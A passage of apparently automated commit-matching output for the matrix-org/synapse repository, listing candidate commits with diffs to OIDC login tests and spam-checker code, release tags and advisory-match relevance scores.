changed the return type of jwt.encode from bytes to str.", - "+ result = jwt.encode(token, secret, \"RS256\")", - "+ if isinstance(result, bytes):", - "+ return result.decode(\"ascii\")", - "+ return result" - ], - "changed_files": [ - "changelog.d/8986.misc", - "tests/rest/client/v1/test_login.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8986": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8986, 8986", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: version", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8986", - "relevance": 2 - } - ] - }, - { - "commit_id": "895e04319ba457a855207b8bb804f7360a258464", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607945930, - "hunks": 47, - "message": "Preparatory refactoring of the OidcHandlerTestCase (#8911) * Remove references to handler._auth_handler (and replace them with hs.get_auth_handler) * Factor out a utility function for building Requests * Remove mocks of `OidcHandler._map_userinfo_to_user` This method is going away, so mocking it out is no longer a valid approach. Instead, we mock out lower-level methods (eg _remote_id_from_userinfo), or simply allow the regular implementation to proceed and update the expectations accordingly. * Remove references to `OidcHandler._map_userinfo_to_user` from tests This method is going away, so we can no longer use it as a test point. Instead we build mock \"callback\" requests which we pass into `handle_oidc_callback`, and verify correct behaviour by mocking out `AuthHandler.complete_sso_login`.", - "diff": [ - "diff --git a/changelog.d/8911.feature b/changelog.d/8911.feature", - "new file mode 100644", - "index 000000000..d450ef499", - "--- /dev/null", - "+++ b/changelog.d/8911.feature", - "@@ -0,0 +1 @@", - "+Add support for allowing users to pick their own user ID during a single-sign-on login.", - "diff --git a/tests/handlers/test_oidc.py b/tests/handlers/test_oidc.py", - "index 1d99a4543..9878527ba 100644", - "--- a/tests/handlers/test_oidc.py", - "+++ b/tests/handlers/test_oidc.py", - "@@ -17,3 +17,3 @@ from urllib.parse import parse_qs, urlparse", - "-from mock import Mock, patch", - "+from mock import ANY, Mock, patch", - "@@ -84,3 +84,3 @@ class TestMappingProviderFailures(TestMappingProvider):", - "-def simple_async_mock(return_value=None, raises=None):", - "+def simple_async_mock(return_value=None, raises=None) -> Mock:", - " # AsyncMock is not available in python3.5, this mimics part of its behaviour", - "@@ -162,2 +162,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " self.render_error.reset_mock()", - "+ return args", - "@@ -376,7 +377,8 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "+ username = \"bar\"", - " userinfo = {", - " \"sub\": \"foo\",", - "- \"preferred_username\": \"bar\",", - "+ \"username\": username,", - " }", - "- user_id = \"@foo:domain.org\"", - "+ expected_user_id = \"@%s:%s\" % (username, self.hs.hostname)", - " self.handler._exchange_code = simple_async_mock(return_value=token)", - "@@ -384,14 +386,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " self.handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", - "- self.handler._map_userinfo_to_user = simple_async_mock(return_value=user_id)", - "- self.handler._auth_handler.complete_sso_login = simple_async_mock()", - "- request = Mock(", - "- spec=[", - "- \"args\",", - "- \"getCookie\",", - "- \"addCookie\",", - "- \"requestHeaders\",", - "- \"getClientIP\",", - "- \"get_user_agent\",", - "- ]", - "- )", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "@@ -403,3 +395,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " ip_address = \"10.0.0.1\"", - "- request.getCookie.return_value = self.handler._generate_oidc_session_token(", - "+ session = self.handler._generate_oidc_session_token(", - " state=state,", - "@@ -409,9 +401,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " )", - "-", - "- request.args = {}", - "- request.args[b\"code\"] = [code.encode(\"utf-8\")]", - "- request.args[b\"state\"] = [state.encode(\"utf-8\")]", - "-", - "- request.getClientIP.return_value = ip_address", - "- request.get_user_agent.return_value = user_agent", - "+ request = self._build_callback_request(", - "+ code, state, session, user_agent=user_agent, ip_address=ip_address", - "+ )", - "@@ -419,4 +407,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", - "- self.handler._auth_handler.complete_sso_login.assert_called_once_with(", - "- user_id, request, client_redirect_url, {},", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ expected_user_id, request, client_redirect_url, {},", - " )", - "@@ -424,5 +412,2 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " self.handler._parse_id_token.assert_called_once_with(token, nonce=nonce)", - "- self.handler._map_userinfo_to_user.assert_called_once_with(", - "- userinfo, token, user_agent, ip_address", - "- )", - " self.handler._fetch_userinfo.assert_not_called()", - "@@ -431,8 +416,9 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " # Handle mapping errors", - "- self.handler._map_userinfo_to_user = simple_async_mock(", - "- raises=MappingException()", - "- )", - "- self.get_success(self.handler.handle_oidc_callback(request))", - "- self.assertRenderedError(\"mapping_error\")", - "- self.handler._map_userinfo_to_user = simple_async_mock(return_value=user_id)", - "+ with patch.object(", - "+ self.handler,", - "+ \"_remote_id_from_userinfo\",", - "+ new=Mock(side_effect=MappingException()),", - "+ ):", - "+ self.get_success(self.handler.handle_oidc_callback(request))", - "+ self.assertRenderedError(\"mapping_error\")", - "@@ -443,6 +429,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", - "- self.handler._auth_handler.complete_sso_login.reset_mock()", - "+ auth_handler.complete_sso_login.reset_mock()", - " self.handler._exchange_code.reset_mock()", - " self.handler._parse_id_token.reset_mock()", - "- self.handler._map_userinfo_to_user.reset_mock()", - " self.handler._fetch_userinfo.reset_mock()", - "@@ -453,4 +438,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", - "- self.handler._auth_handler.complete_sso_login.assert_called_once_with(", - "- user_id, request, client_redirect_url, {},", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ expected_user_id, request, client_redirect_url, {},", - " )", - "@@ -458,5 +443,2 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " self.handler._parse_id_token.assert_not_called()", - "- self.handler._map_userinfo_to_user.assert_called_once_with(", - "- userinfo, token, user_agent, ip_address", - "- )", - " self.handler._fetch_userinfo.assert_called_once_with(token)", - "@@ -611,19 +593,9 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " \"sub\": \"foo\",", - "+ \"username\": \"foo\",", - " \"phone\": \"1234567\",", - " }", - "- user_id = \"@foo:domain.org\"", - " self.handler._exchange_code = simple_async_mock(return_value=token)", - " self.handler._parse_id_token = simple_async_mock(return_value=userinfo)", - "- self.handler._map_userinfo_to_user = simple_async_mock(return_value=user_id)", - "- self.handler._auth_handler.complete_sso_login = simple_async_mock()", - "- request = Mock(", - "- spec=[", - "- \"args\",", - "- \"getCookie\",", - "- \"addCookie\",", - "- \"requestHeaders\",", - "- \"getClientIP\",", - "- \"get_user_agent\",", - "- ]", - "- )", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "@@ -631,3 +603,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " client_redirect_url = \"http://client/redirect\"", - "- request.getCookie.return_value = self.handler._generate_oidc_session_token(", - "+ session = self.handler._generate_oidc_session_token(", - " state=state,", - "@@ -637,9 +609,3 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " )", - "-", - "- request.args = {}", - "- request.args[b\"code\"] = [b\"code\"]", - "- request.args[b\"state\"] = [state.encode(\"utf-8\")]", - "-", - "- request.getClientIP.return_value = \"10.0.0.1\"", - "- request.get_user_agent.return_value = \"Browser\"", - "+ request = self._build_callback_request(\"code\", state, session)", - "@@ -647,4 +613,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", - "- self.handler._auth_handler.complete_sso_login.assert_called_once_with(", - "- user_id, request, client_redirect_url, {\"phone\": \"1234567\"},", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ \"@foo:test\", request, client_redirect_url, {\"phone\": \"1234567\"},", - " )", - "@@ -653,2 +619,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " \"\"\"Ensure that mapping the userinfo returned from a provider to an MXID works properly.\"\"\"", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "+", - " userinfo = {", - "@@ -657,10 +626,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- # The token doesn't matter with the default user mapping provider.", - "- token = {}", - "- mxid = self.get_success(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ self._make_callback_with_userinfo(userinfo)", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ \"@test_user:test\", ANY, ANY, {}", - " )", - "- self.assertEqual(mxid, \"@test_user:test\")", - "+ auth_handler.complete_sso_login.reset_mock()", - "@@ -671,8 +637,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- mxid = self.get_success(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ self._make_callback_with_userinfo(userinfo)", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ \"@test_user_2:test\", ANY, ANY, {}", - " )", - "- self.assertEqual(mxid, \"@test_user_2:test\")", - "+ auth_handler.complete_sso_login.reset_mock()", - "@@ -685,10 +650,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " userinfo = {\"sub\": \"test3\", \"username\": \"test_user_3\"}", - "- e = self.get_failure(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- ),", - "- MappingException,", - "- )", - "- self.assertEqual(", - "- str(e.value), \"Mapping provider does not support de-duplicating Matrix IDs\",", - "+ self._make_callback_with_userinfo(userinfo)", - "+ auth_handler.complete_sso_login.assert_not_called()", - "+ self.assertRenderedError(", - "+ \"mapping_error\",", - "+ \"Mapping provider does not support de-duplicating Matrix IDs\",", - " )", - "@@ -704,2 +666,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "+", - " # Map a user via SSO.", - "@@ -709,17 +674,14 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- token = {}", - "- mxid = self.get_success(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ self._make_callback_with_userinfo(userinfo)", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ user.to_string(), ANY, ANY, {},", - " )", - "- self.assertEqual(mxid, \"@test_user:test\")", - "+ auth_handler.complete_sso_login.reset_mock()", - " # Subsequent calls should map to the same mxid.", - "- mxid = self.get_success(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ self._make_callback_with_userinfo(userinfo)", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ user.to_string(), ANY, ANY, {},", - " )", - "- self.assertEqual(mxid, \"@test_user:test\")", - "+ auth_handler.complete_sso_login.reset_mock()", - "@@ -734,9 +696,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- token = {}", - "- mxid = self.get_success(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ self._make_callback_with_userinfo(userinfo)", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ user.to_string(), ANY, ANY, {},", - " )", - "- self.assertEqual(mxid, \"@test_user:test\")", - "+ auth_handler.complete_sso_login.reset_mock()", - "@@ -757,10 +717,7 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- e = self.get_failure(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- ),", - "- MappingException,", - "- )", - "+ self._make_callback_with_userinfo(userinfo)", - "+ auth_handler.complete_sso_login.assert_not_called()", - "+ args = self.assertRenderedError(\"mapping_error\")", - " self.assertTrue(", - "- str(e.value).startswith(", - "+ args[2].startswith(", - " \"Attempted to login as '@TEST_USER_2:test' but it matches more than one user inexactly:\"", - "@@ -775,8 +732,6 @@ class OidcHandlerTestCase(HomeserverTestCase):", - "- mxid = self.get_success(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- )", - "+ self._make_callback_with_userinfo(userinfo)", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ \"@TEST_USER_2:test\", ANY, ANY, {},", - " )", - "- self.assertEqual(mxid, \"@TEST_USER_2:test\")", - "@@ -784,15 +739,4 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " \"\"\"If the mapping provider generates an invalid localpart it should be rejected.\"\"\"", - "- userinfo = {", - "- \"sub\": \"test2\",", - "- \"username\": \"f\u00c3\u00b6\u00c3\u00b6\",", - "- }", - "- token = {}", - "-", - "- e = self.get_failure(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- ),", - "- MappingException,", - "- )", - "- self.assertEqual(str(e.value), \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\")", - "+ self._make_callback_with_userinfo({\"sub\": \"test2\", \"username\": \"f\u00c3\u00b6\u00c3\u00b6\"})", - "+ self.assertRenderedError(\"mapping_error\", \"localpart is invalid: f\u00c3\u00b6\u00c3\u00b6\")", - "@@ -809,2 +753,5 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " \"\"\"The mapping provider can retry generating an MXID if the MXID is already in use.\"\"\"", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "+", - " store = self.hs.get_datastore()", - "@@ -817,10 +764,9 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- token = {}", - "- mxid = self.get_success(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- )", - "- )", - "+ self._make_callback_with_userinfo(userinfo)", - "+", - " # test_user is already taken, so test_user1 gets registered instead.", - "- self.assertEqual(mxid, \"@test_user1:test\")", - "+ auth_handler.complete_sso_login.assert_called_once_with(", - "+ \"@test_user1:test\", ANY, ANY, {},", - "+ )", - "+ auth_handler.complete_sso_login.reset_mock()", - "@@ -840,10 +786,68 @@ class OidcHandlerTestCase(HomeserverTestCase):", - " }", - "- e = self.get_failure(", - "- self.handler._map_userinfo_to_user(", - "- userinfo, token, \"user-agent\", \"10.10.10.10\"", - "- ),", - "- MappingException,", - "+ self._make_callback_with_userinfo(userinfo)", - "+ auth_handler.complete_sso_login.assert_not_called()", - "+ self.assertRenderedError(", - "+ \"mapping_error\", \"Unable to generate a Matrix ID from the SSO response\"", - " )", - "- self.assertEqual(", - "- str(e.value), \"Unable to generate a Matrix ID from the SSO response\"", - "+", - "+ def _make_callback_with_userinfo(", - "+ self, userinfo: dict, client_redirect_url: str = \"http://client/redirect\"", - "+ ) -> None:", - "+ self.handler._exchange_code = simple_async_mock(return_value={})", - "+ self.handler._parse_id_token = simple_async_mock(return_value=userinfo)", - "+ self.handler._fetch_userinfo = simple_async_mock(return_value=userinfo)", - "+ auth_handler = self.hs.get_auth_handler()", - "+ auth_handler.complete_sso_login = simple_async_mock()", - "+", - "+ state = \"state\"", - "+ session = self.handler._generate_oidc_session_token(", - "+ state=state,", - "+ nonce=\"nonce\",", - "+ client_redirect_url=client_redirect_url,", - "+ ui_auth_session_id=None,", - "+ )", - "+ request = self._build_callback_request(\"code\", state, session)", - "+", - "+ self.get_success(self.handler.handle_oidc_callback(request))", - "+", - "+ def _build_callback_request(", - "+ self,", - "+ code: str,", - "+ state: str,", - "+ session: str,", - "+ user_agent: str = \"Browser\",", - "+ ip_address: str = \"10.0.0.1\",", - "+ ):", - "+ \"\"\"Builds a fake SynapseRequest to mock the browser callback", - "+", - "+ Returns a Mock object which looks like the SynapseRequest we get from a browser", - "+ after SSO (before we return to the client)", - "+", - "+ Args:", - "+ code: the authorization code which would have been returned by the OIDC", - "+ provider", - "+ state: the \"state\" param which would have been passed around in the", - "+ query param. Should be the same as was embedded in the session in", - "+ _build_oidc_session.", - "+ session: the \"session\" which would have been passed around in the cookie.", - "+ user_agent: the user-agent to present", - "+ ip_address: the IP address to pretend the request came from", - "+ \"\"\"", - "+ request = Mock(", - "+ spec=[", - "+ \"args\",", - "+ \"getCookie\",", - "+ \"addCookie\",", - "+ \"requestHeaders\",", - "+ \"getClientIP\",", - "+ \"get_user_agent\",", - "+ ]", - " )", - "+", - "+ request.getCookie.return_value = session", - "+ request.args = {}", - "+ request.args[b\"code\"] = [code.encode(\"utf-8\")]", - "+ request.args[b\"state\"] = [state.encode(\"utf-8\")]", - "+ request.getClientIP.return_value = ip_address", - "+ request.get_user_agent.return_value = user_agent", - "+ return request" - ], - "changed_files": [ - "changelog.d/8911.feature", - "tests/handlers/test_oidc.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8911": "Preparatory refactoring of the SamlHandlerTestCase #8938 Debian builds fail with ascii encoding error on older distros #9076" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8911, 8911", - "relevance": 32 - }, - { - "id": "ADV_KEYWORDS_IN_MSG", - "message": "The commit message and the advisory description contain the following keywords: reference, request", - "relevance": 4 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8911", - "relevance": 2 - } - ] - }, - { - "commit_id": "f14428b25c37e44675edac4a80d7bd1e47112586", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607713515, - "hunks": 52, - "message": "Allow spam-checker modules to be provide async methods. (#8890) Spam checker modules can now provide async methods. This is implemented in a backwards-compatible manner.", - "diff": [ - "diff --git a/changelog.d/8890.feature b/changelog.d/8890.feature", - "new file mode 100644", - "index 000000000..97aa72a76", - "--- /dev/null", - "+++ b/changelog.d/8890.feature", - "@@ -0,0 +1 @@", - "+Spam-checkers may now define their methods as `async`.", - "diff --git a/synapse/events/spamcheck.py b/synapse/events/spamcheck.py", - "index 936896656..e7e3a7b9a 100644", - "--- a/synapse/events/spamcheck.py", - "+++ b/synapse/events/spamcheck.py", - "@@ -17,3 +17,3 @@", - " import inspect", - "-from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple", - "+from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union", - "@@ -21,2 +21,3 @@ from synapse.spam_checker_api import RegistrationBehaviour", - " from synapse.types import Collection", - "+from synapse.util.async_helpers import maybe_awaitable", - "@@ -41,3 +42,5 @@ class SpamChecker:", - "- def check_event_for_spam(self, event: \"synapse.events.EventBase\") -> bool:", - "+ async def check_event_for_spam(", - "+ self, event: \"synapse.events.EventBase\"", - "+ ) -> Union[bool, str]:", - " \"\"\"Checks if a given event is considered \"spammy\" by this server.", - "@@ -52,6 +55,7 @@ class SpamChecker:", - " Returns:", - "- True if the event is spammy.", - "+ True or a string if the event is spammy. If a string is returned it", - "+ will be used as the error message returned to the user.", - " \"\"\"", - " for spam_checker in self.spam_checkers:", - "- if spam_checker.check_event_for_spam(event):", - "+ if await maybe_awaitable(spam_checker.check_event_for_spam(event)):", - " return True", - "@@ -60,3 +64,3 @@ class SpamChecker:", - "- def user_may_invite(", - "+ async def user_may_invite(", - " self, inviter_userid: str, invitee_userid: str, room_id: str", - "@@ -77,3 +81,7 @@ class SpamChecker:", - " if (", - "- spam_checker.user_may_invite(inviter_userid, invitee_userid, room_id)", - "+ await maybe_awaitable(", - "+ spam_checker.user_may_invite(", - "+ inviter_userid, invitee_userid, room_id", - "+ )", - "+ )", - " is False", - "@@ -84,3 +92,3 @@ class SpamChecker:", - "- def user_may_create_room(self, userid: str) -> bool:", - "+ async def user_may_create_room(self, 